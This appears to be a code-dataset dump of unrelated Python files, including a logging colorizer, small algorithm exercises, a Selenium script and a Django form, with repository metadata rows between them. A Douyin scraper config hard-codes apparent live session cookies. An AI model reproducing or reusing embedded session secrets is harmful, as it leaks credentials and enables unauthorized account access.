def rexlex_trace_result(self, message, *args, **kws):
    if self.isEnabledFor(REXLEX_TRACE_RESULT):
        self._log(REXLEX_TRACE_RESULT, message, args, **kws)
setattr(logging.Logger, 'rexlex_trace_result', rexlex_trace_result)
def rexlex_trace_meta(self, message, *args, **kws):
    if self.isEnabledFor(REXLEX_TRACE_META):
        self._log(REXLEX_TRACE_META, message, args, **kws)
setattr(logging.Logger, 'rexlex_trace_meta', rexlex_trace_meta)
def rexlex_trace_state(self, message, *args, **kws):
    if self.isEnabledFor(REXLEX_TRACE_STATE):
        self._log(REXLEX_TRACE_STATE, message, args, **kws)
setattr(logging.Logger, 'rexlex_trace_state', rexlex_trace_state)
def rexlex_trace_rule(self, message, *args, **kws):
    if self.isEnabledFor(REXLEX_TRACE_RULE):
        self._log(REXLEX_TRACE_RULE, message, args, **kws)
setattr(logging.Logger, 'rexlex_trace_rule', rexlex_trace_rule)
def rexlex_trace(self, message, *args, **kws):
    if self.isEnabledFor(REXLEX_TRACE):
        self._log(REXLEX_TRACE, message, args, **kws)
setattr(logging.Logger, 'rexlex_trace', rexlex_trace)
# ---------------------------------------------------------------------------
# Colorize them.
# ---------------------------------------------------------------------------
#
# Copyright (C) 2010-2012 Vinay Sajip. All rights reserved.
# Licensed under the new BSD license.
#
import ctypes
import logging
import os
class ColorizingStreamHandler(logging.StreamHandler):
    """StreamHandler that colors the custom rexlex levels on a terminal.

    Derived from Vinay Sajip's colorizing handler (see file header); on
    POSIX it emits ANSI escape sequences, on Windows ('nt') it translates
    them to console attribute calls via ctypes.
    """
    # color names to indices
    color_map = {
        'black': 0,
        'red': 1,
        'green': 2,
        'yellow': 3,
        'blue': 4,
        'magenta': 5,
        'cyan': 6,
        'white': 7,
    }
    #levels to (background, foreground, bold/intense)
    # Chosen per-platform because Windows console bold/intensity renders
    # differently from ANSI bold.
    if os.name == 'nt':
        level_map = {
            REXLEX_TRACE: (None, 'blue', True),
            REXLEX_TRACE_RULE: (None, 'white', False),
            REXLEX_TRACE_STATE: (None, 'yellow', True),
            REXLEX_TRACE_META: (None, 'red', True),
            REXLEX_TRACE_RESULT: ('red', 'white', True),
        }
    else:
        level_map = {
            REXLEX_TRACE: (None, 'blue', False),
            REXLEX_TRACE_RULE: (None, 'white', False),
            REXLEX_TRACE_STATE: (None, 'yellow', False),
            REXLEX_TRACE_META: (None, 'red', False),
            REXLEX_TRACE_RESULT: ('red', 'white', True),
        }
    # ANSI Control Sequence Introducer and the reset-all-attributes code.
    csi = '\x1b['
    reset = '\x1b[0m'
    @property
    def is_tty(self):
        """True when the underlying stream looks like a terminal."""
        # bluff for Jenkins
        if os.environ.get('JENKINS_URL'):
            return True
        isatty = getattr(self.stream, 'isatty', None)
        return isatty and isatty()
    def emit(self, record):
        # Standard Handler.emit contract: format, write (colorized only on
        # a tty), terminate, flush; never let logging errors propagate.
        try:
            message = self.format(record)
            stream = self.stream
            if not self.is_tty:
                stream.write(message)
            else:
                self.output_colorized(message)
            stream.write(getattr(self, 'terminator', '\n'))
            self.flush()
        except (KeyboardInterrupt, SystemExit):
            raise
        except:
            self.handleError(record)
    # output_colorized is defined per-platform at class-creation time.
    if os.name != 'nt':
        # POSIX terminals understand ANSI escapes natively: pass through.
        def output_colorized(self, message): # NOQA
            self.stream.write(message)
    else:
        import re
        # Matches one ANSI SGR escape, capturing its ;-separated parameters.
        ansi_esc = re.compile(r'\x1b\[((?:\d+)(?:;(?:\d+))*)m')
        # ANSI color index -> Windows console color bits.
        nt_color_map = {
            0: 0x00, # black
            1: 0x04, # red
            2: 0x02, # green
            3: 0x06, # yellow
            4: 0x01, # blue
            5: 0x05, # magenta
            6: 0x03, # cyan
            7: 0x07, # white
        }
        def output_colorized(self, message): # NOQA
            # Split the message into alternating text / escape-parameter
            # parts; write the text and translate escapes into console
            # attribute changes (only for stdout/stderr handles).
            parts = self.ansi_esc.split(message)
            write = self.stream.write
            h = None
            fd = getattr(self.stream, 'fileno', None)
            if fd is not None:
                fd = fd()
                if fd in (1, 2): # stdout or stderr
                    h = ctypes.windll.kernel32.GetStdHandle(-10 - fd)
            while parts:
                text = parts.pop(0)
                if text:
                    write(text)
                if parts:
                    params = parts.pop(0)
                    if h is not None:
                        params = [int(p) for p in params.split(';')]
                        color = 0
                        for p in params:
                            if 40 <= p <= 47:
                                # 40-47: background color.
                                color |= self.nt_color_map[p - 40] << 4
                            elif 30 <= p <= 37:
                                # 30-37: foreground color.
                                color |= self.nt_color_map[p - 30]
                            elif p == 1:
                                color |= 0x08 # foreground intensity on
                            elif p == 0: # reset to default color
                                color = 0x07
                            else:
                                pass # error condition ignored
                        ctypes.windll.kernel32.SetConsoleTextAttribute(h,
                                                                       color)
    def colorize(self, message, record):
        """Wrap message in ANSI codes chosen by the record's level."""
        if record.levelno in self.level_map:
            bg, fg, bold = self.level_map[record.levelno]
            params = []
            if bg in self.color_map:
                params.append(str(self.color_map[bg] + 40))
            if fg in self.color_map:
                params.append(str(self.color_map[fg] + 30))
            if bold:
                params.append('1')
            if params:
                message = ''.join((self.csi, ';'.join(params),
                                   'm', message, self.reset))
        return message
    def format(self, record):
        # Colorize only the first line so multi-line tracebacks stay plain.
        message = logging.StreamHandler.format(self, record)
        if self.is_tty:
            # Don't colorize any traceback
            parts = message.split('\n', 1)
            parts[0] = self.colorize(parts[0], record)
            message = '\n'.join(parts)
        return message
| [
"twneale@gmail.com"
] | twneale@gmail.com |
752dd8866e161902f3d6aac9099c7dfaea881ff2 | b299e95c1660aeb9933d83b15689d39e3af60456 | /www_douyin_com/config.py | 5a60a49447d372f7bfce14b609fd8a28db5669ab | [] | no_license | beckfun/spider_world | 537e700ec84e00efb18fbe4c78ace18f0fe54151 | 06a39872d7dfaf1421b19dbed78ad3c8139f0a19 | refs/heads/master | 2020-05-04T09:06:19.995407 | 2019-04-02T01:19:48 | 2019-04-02T01:19:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,268 | py | #!/usr/bin/env python
# coding:utf-8
# Request tuning knobs. The names keep the original misspellings
# ("DEFALUT", "RANDON") because other modules may import them by name.
DEFALUT_REQ_TIMEOUT = 5
MAX_RETRY_REQ_TIMES = 3
RETRY_RANDON_MIN_WAIT = 1000 # ms
RETRY_RANDON_MAX_WAIT = 5000 # ms
# Headers sent with every request; the user agent matches the okhttp value
# used elsewhere in this module's APPINFO fingerprint.
COMMON_HEADERS = {"User-Agent": "okhttp/3.10.0.1"}
# Device/app fingerprint parameters for the Douyin (aweme) API.
APPINFO = {
    "version_code": "290",
    "app_version": "2.9.0",
    "version_name": "2.9.0",
    "device_platform": "android",
    "ssmix": "a",
    "device_type": "ONEPLUS+A5000",
    "device_brand": "OnePlus",
    "language": "zh",
    "os_api": "28",
    "os_version": "9",
    "manifest_version_code": "290",
    "resolution": "1080*1920",
    "dpi": "420",
    "update_version_code": "2902",
    "_rticket": "1548672388498",
    "channel": "wandoujia_zhiwei",
    "app_name": "aweme",
    "build_number": "27014",
    "aid": "1128",
    "ac": "WIFI",
}
# Hard-coded session cookies. NOTE(review): these look like live session
# identifiers committed to source control — treat as secrets and rotate.
COMMON_COOKIES = {
    'ttreq': '1$f58a422877af68a234141b2dc94eda292d8cd901',
    'sid_guard': '190e1d75900416b7eb62c639d7fe653a%7C1548671527%7C5184000%7CFri%2C+29-Mar-2019+10%3A32%3A07+GMT',
    'uid_tt': '51289fc385905048dbc45575efead7d5',
    'sid_tt': '190e1d75900416b7eb62c639d7fe653a',
    'sessionid': '190e1d75900416b7eb62c639d7fe653a',
    'odin_tt': "d44fbf1baf710b502070386558b48c94250edc24497a85f029c3cbef046cf706d27692be6295813ef3c6ca20dfa2a405d2d4a0d169224c3f65a1b55e18d33bf7"
}
| [
"funblessu@gmail.com"
] | funblessu@gmail.com |
3c4f26b39fa995a853f94619629f1d94f6dcdd2c | a3b4db7fce646268abf3763cbc105534febf8713 | /Functional Programming/functional_programming_filter.py | 45f3803e0403c755328e910f72f8270ffe5360fd | [
"MIT"
def demo_filter():
    """Demonstrate filtering sequences by a predicate, printing each result."""
    numbers = list(range(1, 11))

    # Example 1: keep the even numbers -> [2, 4, 6, 8, 10]
    print([n for n in numbers if n % 2 == 0])

    # Example 2: keep the odd numbers -> [1, 3, 5, 7, 9]
    print([n for n in numbers if n % 2 == 1])

    # Example 3: keep the multiples of 3 -> [3, 6, 9]
    print([n for n in numbers if n % 3 == 0])

    words = ["Apple", "Banana", "cat", "dog", "elephant"]

    # Example 4: keep the three-letter words -> ['cat', 'dog']
    print([w for w in words if len(w) == 3])

    # Example 5: keep the all-lowercase words -> ['cat', 'dog', 'elephant']
    print([w for w in words if w.islower()])
if __name__ == '__main__':
    # Run the demonstration when executed as a script.
    demo_filter()
| [
"brianchiang1988@icloud.com"
] | brianchiang1988@icloud.com |
9281e896a60cfa26ef19185971c84b694854a02d | 5c099927aedc6fdbc515f40ff543c65b3bf4ec67 | /algorithms/symmetric-tree/src/Solution.py | 3c4be730abd0ef2e7a6b6f156a31cef45ad5def5 | [] | no_license | bingzhong-project/leetcode | 7a99cb6af1adfbd9bb1996a7f66a65679053c478 | ba82e7d94840b3fec272e4c5f82e3a2cfe4b0505 | refs/heads/master | 2020-04-15T09:27:33.979519 | 2020-03-10T03:43:07 | 2020-03-10T03:43:07 | 164,550,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,354 | py | # Definition for a binary tree node.
class TreeNode:
    """Binary tree node: a value plus optional left/right children."""
    def __init__(self, x):
        # Payload value; both children start detached.
        self.val = x
        self.left = None
        self.right = None
class Solution:
    def isSymmetric(self, root):
        """
        :type root: TreeNode
        :rtype: bool

        Return True when the tree is a mirror image of itself around its
        center.

        The original level-order implementation encoded missing children
        with the sentinel value -1, which misclassifies trees whose nodes
        actually hold -1 (e.g. a root with a single left child of value -1
        was reported symmetric). The recursive mirror comparison below
        needs no sentinel: O(n) time, O(h) recursion depth.
        """
        def mirrored(left, right):
            # Two absent subtrees mirror each other trivially.
            if left is None and right is None:
                return True
            # Exactly one absent: asymmetric.
            if left is None or right is None:
                return False
            # Values must match and the subtrees must mirror crosswise.
            return (left.val == right.val
                    and mirrored(left.left, right.right)
                    and mirrored(left.right, right.left))

        return root is None or mirrored(root.left, root.right)
| [
"zhongyongbin@foxmail.com"
] | zhongyongbin@foxmail.com |
846156dea3633908b6dc661e9d7f8eecb044c23b | 4be944cfcd6a9fd45c727e063765d59c77079877 | /Anaklit.py | 3a87ae792b14bff93447e29150343826ed94bcb0 | [] | no_license | Igor-Zhuk/Lessons-IZ- | f1b67c94de85c8f3796c37a30f33e49f2bbb62ce | 120b94cc115395632dd872b7ef62cac86aa65d15 | refs/heads/master | 2021-01-11T20:37:44.636402 | 2017-01-27T17:33:08 | 2017-01-27T17:33:08 | 79,156,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | from selenium import webdriver
# Launch a Chrome session driven by Selenium.
driver = webdriver.Chrome()
# Open the Ukrainian Wikipedia.
driver.get('http://uk.wikipedia.org')
# Type the query ("list of Roman popes") into the search box.
seach_form = driver.find_element_by_css_selector('#searchInput')
seach_form.send_keys('список римських пап')
# Submit the search.
seach_button = driver.find_element_by_css_selector('#searchButton')
seach_button.click()
# Click an image inside a specific table cell of the results article.
# NOTE(review): this positional CSS path assumes a fixed page layout and is
# brittle — verify it still matches the live article before relying on it.
pope_cletus = driver.find_element_by_css_selector('div#mw-content-text table:nth-child(9) > tbody > tr:nth-child(5) > td:nth-child(3) > a > img')
pope_cletus.click()
| [
"test@test.com"
] | test@test.com |
621dc95e864026fe0243c7a2462182de011d8f60 | 299fe2ca879e509798e95c00b7ba33914031f4a7 | /eruditio/shared_apps/django_metatagging/forms.py | ed4aeffd7ebd07107be6b4732d04b510f4c4f84f | [
"MIT"
] | permissive | genghisu/eruditio | dcf2390c98d5d1a7c1044a9221bf319cb7d1f0f6 | 5f8f3b682ac28fd3f464e7a993c3988c1a49eb02 | refs/heads/master | 2021-01-10T11:15:28.230527 | 2010-04-23T21:13:01 | 2010-04-23T21:13:01 | 50,865,100 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 894 | py | import django.forms as forms
import django_utils.form_widgets as form_widgets
import django_utils.html_helpers as html_helpers
import django_utils.form_helpers as form_helpers
from tagging.models import Tag
def build_retag_form(object):
    """Dynamically build a one-field form class pre-filled with the
    object's current tags, joined by commas."""
    current_tags = Tag.objects.get_for_object(object)
    joined_tags = ",".join(tag.name for tag in current_tags)
    # Single 'tags' CharField seeded with the existing tag string.
    field_map = {'tags' : forms.CharField(max_length = 200,
                                          required = True,
                                          initial = joined_tags,
                                          widget = form_widgets.StandardCharfield(attrs={'class':'required question_form'}),
                                          help_text = 'Combine multiple words into single-words. Seperate tags using commas. Maximum five tags. At least one tag required.')}
    # Build the form class on the fly, inheriting the project's DivForm.
    return type('RetagForm', (form_helpers.DivForm, ), field_map)
"genghisu@6a795458-236b-11df-a5e4-cb4ff25536bb"
] | genghisu@6a795458-236b-11df-a5e4-cb4ff25536bb |
d15218fea4676e1d776105758f2846a22272c89d | 7d8c7866b15a90f732d46bbbea686f96f104c77a | /lidar/protox2d_consume.py~ | 3fc2755d66902b09750f3dafd59ba447594c8713 | [] | no_license | lforet/astroid | 285cf1d7c6d081095292fea11913a86286d762a6 | 245ffda31d4f11039e8798faf6ca959ed087ac65 | refs/heads/master | 2020-12-24T15:58:24.335543 | 2015-05-15T12:37:13 | 2015-05-15T12:37:13 | 13,452,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,775 | #!/usr/bin/python
import pika
import thread, time, sys, traceback
''' USAGE:
lidar = consume_lidar(channel_name.#, ip_of_publisher)
EXAMPLE:
lidar = consume_lidar('lidar.1', 'localhost')
'''
class consume_lidar():
    """Consumes lidar messages from a RabbitMQ topic exchange (Python 2).

    Binds an exclusive, auto-deleting queue to the 'astroid_data_feed'
    exchange using `channel_name` as the routing key and polls it forever
    on a background thread started from __init__.
    """
    def __init__(self, channel_name, host_ip):
        self.id = None
        self.rpm = None
        self.data = None
        #-------------connection variables
        self.channel_name = channel_name
        self.host_ip = host_ip
        self.queue_name = None
        self.connection = None
        self.channel = None
        #----------------------RUN
        self.run()
    def connect(self):
        """(Re)open the blocking connection and bind a fresh consumer queue."""
        self.connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.host_ip))
        self.channel = self.connection.channel()
        self.channel.exchange_declare(exchange='astroid_data_feed',type='topic')
        # Messages expire after 1s so a slow consumer never reads stale data.
        result = self.channel.queue_declare(exclusive=True, auto_delete=True, arguments={'x-message-ttl':1000})
        self.queue_name = result.method.queue
        binding_keys = self.channel_name
        self.channel.queue_bind(exchange='astroid_data_feed', queue=self.queue_name, routing_key=binding_keys)
    def read_lidar(self):
        """Poll the queue forever, printing and acking each message body."""
        #method_frame = None
        while True:
            # Reconnect whenever the connection is missing or has dropped.
            if self.connection == None or self.connection.is_open == False:
                self.connect()
            #time.sleep(0.01) # do not hog the processor power
            #print "-" * 50
            method_frame, properties, body = self.channel.basic_get(queue=self.queue_name)
            if method_frame:
                # Display the message parts
                print body
                self.channel.basic_ack(method_frame.delivery_tag)
            #else:
            #    print "no msgs read"
            #    time.sleep(.25)
    def run(self):
        """Start the polling loop on a daemonless background thread."""
        self.th = thread.start_new_thread(self.read_lidar, ())
if __name__== "__main__":
    # The consumer polls on its own thread, so the main thread just idles.
    lidar = consume_lidar('protox2d.1', 'localhost')
    while True:
        time.sleep(1)
        #print 'signal strength:', wifi.signal_strength
| [
"laird@isotope11.com"
] | laird@isotope11.com | |
3a75dd6f6af19d4710fd04b52d23f4908db05a5e | 9a4de72aab094c87cfee62380e7f2613545eecfb | /deploy/utils/HedwigRegistration.py | d21b9e6c5889a69dfc70076ee782c9dc0df3e2ca | [] | no_license | jamesduan/asset | ed75765c30a5288aaf4f6c56bbf2c9a059105f29 | f71cb623b5ba376309cb728ad5c291ced2ee8bfc | refs/heads/master | 2021-01-10T00:06:41.120678 | 2017-05-27T11:40:48 | 2017-05-27T11:40:48 | 92,730,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,787 | py | # -*- coding: utf-8 -*-
from server.models import ServerStandard
from util.httplib import httpcall2
from django.conf import settings
from django.core.cache import get_cache
from deploy.utils.DeployError import DeployError
from deploy.utils.DeployCommon import i2
import json
class HedwigRegistration:
    """Drives hedwig (service detector) registration for one server (Python 2).

    Looks up the server record by IP, calls the detector HTTP API, and logs
    progress to the deploy cache under `task_id`.
    """
    def __init__(self, ip, task_id):
        self.ip = ip
        # Server record for this IP; status 400 is excluded
        # (presumably retired/decommissioned servers -- TODO confirm).
        self.server_obj = ServerStandard.objects.exclude(server_status_id=400).get(ip=ip)
        self.app_obj = self.server_obj.app
        self.task_id = task_id
        # Logs go to a sibling cache location (base LOCATION + '2').
        self.cache = get_cache('deploy', **{'LOCATION': settings.CACHES['deploy']['LOCATION'] + '2'})
    def unregister(self):
        """Take the server offline in hedwig (detector method 'disabled')."""
        self.hedwig('disabled', '下架')
    def hedwig(self, method, action):
        """Call the detector API with `method`; `action` labels log messages.

        Returns the log message on HTTP 200 (result '0' is treated as
        success); on any other HTTP status delegates to self.ie(), which
        raises DeployError.
        """
        code, response = httpcall2(settings.DETECTOR['PREFIX'] + settings.DETECTOR['METHOD_API'] % (
            settings.CMDB_DETECTOR_IDC_MAPPING.get(self.server_obj.rack.room_id),
            settings.DETECTOR['SECRET'],
            settings.DETECTOR['SECRET'], self.ip, method))
        if code == 200:
            print code, response
            response = json.loads(response)
            # result == '0' is the detector's success code.
            if response.get('result') == '0':
                msg = 'hedwig%s成功' % action
            else:
                msg = 'hedwig%s失败,原因为%s' % (action, response.get('warn'))
            self.i(msg)
            return msg
        else:
            msg = 'hedwig%s失败,原因%s|%s' % (action, code, response)
            self.ie(msg)
    def ie(self, log):
        """Log the failure, set server status to 230, and raise DeployError."""
        self.i('修改服务器状态为预上线失败')
        self.server_obj.server_status_id = 230
        self.server_obj.save()
        self.i(log, error=True)
        raise DeployError(log)
    def i(self, log, error=False):
        """Append a log line for this task to the deploy cache."""
        i2(self.cache, self.task_id, log, error)
| [
"duanlingxiao@yhd.com"
] | duanlingxiao@yhd.com |
f9ab1c3c7ef0193482098d941e3cd7ed5f28368a | c62bd77742f921b8f50b886db7488ce03725f5ab | /aether/gallery/signals.py | 863e74fd222dbcc9ae022b59073f50e8e9ecde03 | [
"MIT"
] | permissive | katajakasa/aetherguild4 | a361688a87d86ae2284a4c07aa9fe9d6b91d2fbb | 2d51f73fad15bfa9a0da052f2509b308d566fafa | refs/heads/master | 2023-08-03T19:51:43.808931 | 2023-07-28T17:35:01 | 2023-07-28T17:35:01 | 143,641,102 | 0 | 0 | MIT | 2023-05-09T22:42:13 | 2018-08-05T19:17:15 | Python | UTF-8 | Python | false | false | 179 | py | from django.urls import reverse
from aether.utils.cache import expire_page
def invalidate_cache(sender, instance, created, **kwargs):
    """Expire the cached gallery index page.

    Signature matches Django's post_save-style signal handlers
    (sender, instance, created) -- NOTE(review): confirm which signal
    this is connected to.
    """
    expire_page(reverse("gallery:index"))
| [
"katajakasa@gmail.com"
] | katajakasa@gmail.com |
4b42af7817fa95de8c35a0ffcd2982a8252f6986 | bf5935cecf1b65461b1de9a67a013f0b03c3d1d0 | /boutique/migrations/0022_reactions.py | 647ad1fa7974382b266bcb9546bb40c4a3275ab3 | [] | no_license | meriemay/Shop | 53287aab6382163e6069130c8e5304ed7ffd0e3b | f5d44193e030c4ef9b5cf27896754767beaee3ef | refs/heads/master | 2021-01-18T17:50:49.688779 | 2017-08-29T14:34:34 | 2017-08-29T14:34:34 | 100,497,878 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-03 11:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the `Reactions` model (auto-generated by Django 1.11.3)."""
    dependencies = [
        # Must be applied after boutique migration 0021.
        ('boutique', '0021_auto_20170801_0931'),
    ]
    operations = [
        migrations.CreateModel(
            name='Reactions',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('label', models.CharField(max_length=200, unique=True)),
            ],
        ),
    ]
| [
"you@example.com"
] | you@example.com |
240e7802a9c640da7dacbe2731ba8831291f84e7 | 59153ef9b6947c5400c4a3cdf208c320e850a1bb | /functions_modules/random/random_learn.py | c737c03046faa3246b53be4f269c063d089ef675 | [] | no_license | QAMilestoneAcademy/PythonForBeginners | fd0089eee1c719853c359c57c310f41a6898ee55 | bf6eac132eee1ffd5fe356497457f9cc12ff5b00 | refs/heads/master | 2022-12-12T10:08:19.919708 | 2020-09-08T05:56:28 | 2020-09-08T05:56:28 | 283,969,801 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | import random
# Showcase the random module's basic sampling helpers.
uniform_value = random.random()
print("random float:", uniform_value)
die_roll = random.randint(1, 10)
print("random int:", die_roll)
stepped_value = random.randrange(1, 10, 2)
print("random from range with step:", stepped_value)
device = random.choice(['computer', 'telephone', 'tv', 'nintendo'])
print("random element from a sequence:", device)
| [
"48306511+QAMilestoneAcademy@users.noreply.github.com"
] | 48306511+QAMilestoneAcademy@users.noreply.github.com |
708ab8176b24a3a3194b4dbd961757684d5752bf | 7bff109bf258f053644b5bd4ceb26f6193eec1f4 | /objfromconfig/objfromconfig.py | ea762f84008dd4c5e7423019ad393983538feca9 | [
"Apache-2.0"
] | permissive | johann-petrak/python-objfromconfig | 3f6529cbf95c07acfe3c1a3da2019f68500712c0 | fc0f11839cfc0da1bd9b8381538fa5a080e575c6 | refs/heads/main | 2023-04-30T00:20:19.813933 | 2021-05-14T18:42:48 | 2021-05-14T18:42:48 | 367,435,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,153 | py | """
Module for creating objects from configuration dicts and retrieve the configuration dicts from objects.
"""
from inspect import signature
from inspect import Parameter
import importlib
def build_args(func, cfg):
    """
    Matches a configuration dictionary against the function parameters.

    Returns an ``(args, kwargs)`` pair suitable for calling
    ``func(*args, **kwargs)``.  Keys starting with "$" (e.g. "$class") are
    ignored; any other key that is not a parameter of ``func`` raises an
    Exception.  A parameter missing from ``cfg`` must have a default (or be
    a *args/**kwargs parameter, which is simply left empty).
    """
    sig = signature(func)
    args = []
    kwargs = {}
    for cn in cfg.keys():
        if not cn.startswith("$") and cn not in sig.parameters:
            raise Exception(f"Function {func} does not have a parameter: {cn}")
    # Once a parameter has been left to its default, later parameters can no
    # longer be passed positionally -- appending them to `args` would shift
    # their values into the wrong slots (this was a real misbinding bug).
    positionals_closed = False
    for n, p in sig.parameters.items():
        if n in cfg:
            val = cfg[n]
        else:
            if p.kind in (Parameter.VAR_POSITIONAL, Parameter.VAR_KEYWORD):
                # *args/**kwargs are always optional.
                continue
            # check if we have a default value for the parameter
            if p.default == Parameter.empty:
                raise Exception("No default and no value specified for parameter", n)
            # Fall back to the default; later params must go by keyword.
            positionals_closed = True
            continue
        if p.kind == Parameter.POSITIONAL_ONLY:
            if positionals_closed:
                raise Exception("Cannot pass positional-only parameter after omitted parameter", n)
            args.append(val)
        elif p.kind == Parameter.POSITIONAL_OR_KEYWORD:
            if positionals_closed:
                kwargs[n] = val
            else:
                args.append(val)
        elif p.kind == Parameter.VAR_POSITIONAL:
            if positionals_closed and val:
                raise Exception("Cannot pass var-positional values after omitted parameter", n)
            args.extend(val)
        elif p.kind == Parameter.KEYWORD_ONLY:
            kwargs[n] = val
        elif p.kind == Parameter.VAR_KEYWORD:
            kwargs.update(val)
    return args, kwargs
def class_from_dict(thedict):
    """Instantiate the class named by thedict["$class"] from the dict's values.

    The "$class" entry must be a dotted path of the form
    [package.module.]ClassName; the remaining entries are matched against the
    class constructor via build_args.  Nested dicts that themselves carry a
    "$class" key are recursively turned into objects first.
    """
    dotted = thedict["$class"]
    # Split at the last dot: everything before it is the module path.
    module_path, _, class_name = dotted.rpartition(".")
    target_cls = getattr(importlib.import_module(module_path), class_name)
    instance = target_cls.__new__(target_cls)
    raw_args, raw_kwargs = build_args(instance.__init__, thedict)

    def materialize(value):
        # A nested {"$class": ...} dict becomes an object of its own.
        if isinstance(value, dict) and "$class" in value:
            return class_from_dict(value)
        return value

    instance.__init__(
        *[materialize(v) for v in raw_args],
        **{key: materialize(v) for key, v in raw_kwargs.items()},
    )
    return instance
class ObjFromConfig:
    """Mixin that lets an object record and expose its construction config.

    Subclasses call store_config(locals()) at the end of __init__; the
    resulting dict (retrievable via get_config) can later recreate an
    equivalent instance through from_config.
    """

    def __init__(self):
        self._objfromconfig_cfg = {}

    @classmethod
    def from_config(cls, config):
        """Recreate an instance from a configuration dictionary."""
        return class_from_dict(config)

    def store_config(self, ldict):
        """Record the constructor arguments found in `ldict` (e.g. locals()).

        Values equal to their declared defaults are omitted; nested
        ObjFromConfig values are stored by their own config dicts.
        """
        config = {}
        for pname, param in signature(self.__init__).parameters.items():
            value = ldict[pname]
            # Skip values identical to the parameter's (non-None) default.
            if param.default is not None and param.default == value:
                continue
            # Store configurable objects by config rather than by reference.
            config[pname] = value.get_config() if isinstance(value, ObjFromConfig) else value
        config["$class"] = f"{self.__module__}.{type(self).__name__}"
        self._objfromconfig_cfg = config

    def get_config(self):
        """Return the configuration dict recorded by store_config."""
        return self._objfromconfig_cfg
| [
"johann.petrak@gmail.com"
] | johann.petrak@gmail.com |
5978c5ee6ec473a050a68ff64a46ead480340d4d | d7e160a2512b9d70b18adbffde4c6d9a61521a12 | /구현/04LockAndKey.py | 66f8d4f12679f5491dde093d3b6d761abe9b1f66 | [] | no_license | EoJin-Kim/CodingTest | 14b6cf7a3bb45954c065efdf9d1e05143cb321a3 | 975c753ee572f605f4d9a12a3dc54ab0d437dade | refs/heads/master | 2023-06-19T16:06:50.625143 | 2021-07-14T13:10:17 | 2021-07-14T13:10:17 | 356,877,598 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,568 | py | import copy
def solution(key, lock):
    """Return True if some rotation/translation of `key` opens `lock`.

    The lock is embedded in the centre of a zero-padded plane so the key may
    overhang the lock's edges; a placement works when every cell of the lock
    region equals exactly 1 after adding the key (holes filled once, bumps
    not doubled).  The leftover debug prints were removed -- they flooded
    stdout and dominated the runtime.
    """
    keyLen = len(key)
    lockLen = len(lock)
    plane = [[0] * (2 * keyLen + lockLen) for _ in range(2 * keyLen + lockLen)]
    # Place the lock in the middle of the padded plane.
    for i in range(len(lock)):
        for j in range(len(lock[0])):
            plane[keyLen + i][keyLen + j] = lock[i][j]
    planeLen = len(plane)
    result = False
    # Try all four rotations of the key at every possible offset.
    for _ in range(4):
        for i in range(planeLen - keyLen + 1):
            for j in range(planeLen - keyLen + 1):
                planeDup = copy.deepcopy(plane)
                for z in range(keyLen):
                    for x in range(keyLen):
                        planeDup[i + z][j + x] += key[z][x]
                result = CheckKey(keyLen, lockLen, planeDup)
                if result:
                    return result
        key = Rotate90(key)
    return result
def Rotate90(a):
    """Return matrix `a` rotated 90 degrees clockwise (as lists of lists)."""
    # Reversing the row order and transposing is a clockwise rotation.
    return [list(column) for column in zip(*a[::-1])]
def CheckKey(keyLen, lockLen, planeDup):
    """Return True iff every cell of the lock region of `planeDup` equals 1.

    The lock occupies rows/columns keyLen .. keyLen+lockLen-1 of the padded
    plane.
    """
    lock_span = range(keyLen, keyLen + lockLen)
    return all(planeDup[r][c] == 1 for r in lock_span for c in lock_span)
# Quick manual check against the sample grids (prints "true" or "false").
if solution([[0, 0, 0], [1, 0, 0], [0, 1, 1]],[[1, 1, 1], [1, 1, 0], [1, 0, 1]]):
    print("true")
else:
print("false") | [
"62640679+EoJin-Kim@users.noreply.github.com"
] | 62640679+EoJin-Kim@users.noreply.github.com |
16197d78cfaf44c38142ce9123d79719a4b50199 | ab519d86d6b336286064450cac7527d798f17880 | /Python/Collections/collections-namedtuple.py | 34220c5cf66721d2312dd6c7ff4363dd4f69418e | [] | no_license | dennisnderitu254/HackerRank-3 | a084f1b1ec72186b6421541d48e74dd75846ce83 | ed6e1eb3ac78bac1063db5b7cadec3f7f5a199f9 | refs/heads/master | 2020-03-11T08:25:20.797174 | 2017-08-03T17:53:52 | 2017-08-03T17:53:52 | 129,883,607 | 1 | 0 | null | 2018-04-17T09:55:02 | 2018-04-17T09:55:01 | null | UTF-8 | Python | false | false | 213 | py | #!/bin/usr/python3
from collections import namedtuple
# Average the MARKS column over n student records read from stdin:
# first line is n, second the column names, then one record per line.
student_count = int(input())
Student = namedtuple("Student", input().strip().split())
total = 0
for _ in range(student_count):
    total += float(Student(*input().strip().split()).MARKS)
print(total / student_count)
| [
"groove679@gmail.com"
] | groove679@gmail.com |
7ab6e8c266f0105d0e490fb7472865ee98ffd55a | 7f86f46f5048fad45cfdebe43b56dfe179688856 | /mmgpy/metamodel/rfr.py | ce46bb761ff9acec123d266f6831102326a192ab | [] | no_license | geoffreygarrett/metamodel-guidance-with-python | 502cc2055427c34d45b55129e290f31ec31d385a | d048a420c69e2fc019478784fcd04be3ae1d72b7 | refs/heads/master | 2022-03-30T09:00:11.520493 | 2020-01-16T13:30:36 | 2020-01-16T13:30:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,612 | py | from ._base import SurrogateModelBaseRegression
from sklearn.ensemble.forest import RandomForestRegressor as sklearnRFR
# Default hyper-parameters forwarded to sklearn's RandomForestRegressor.
# NOTE(review): 'warn' for n_estimators mirrors sklearn's 0.20-era
# default-transition sentinel -- confirm against the pinned sklearn version.
DEFAULT_RFR_PARAMS = {
    "n_estimators": 'warn',
    "criterion": "mse",
    "max_depth": None,
    "min_samples_split": 2,
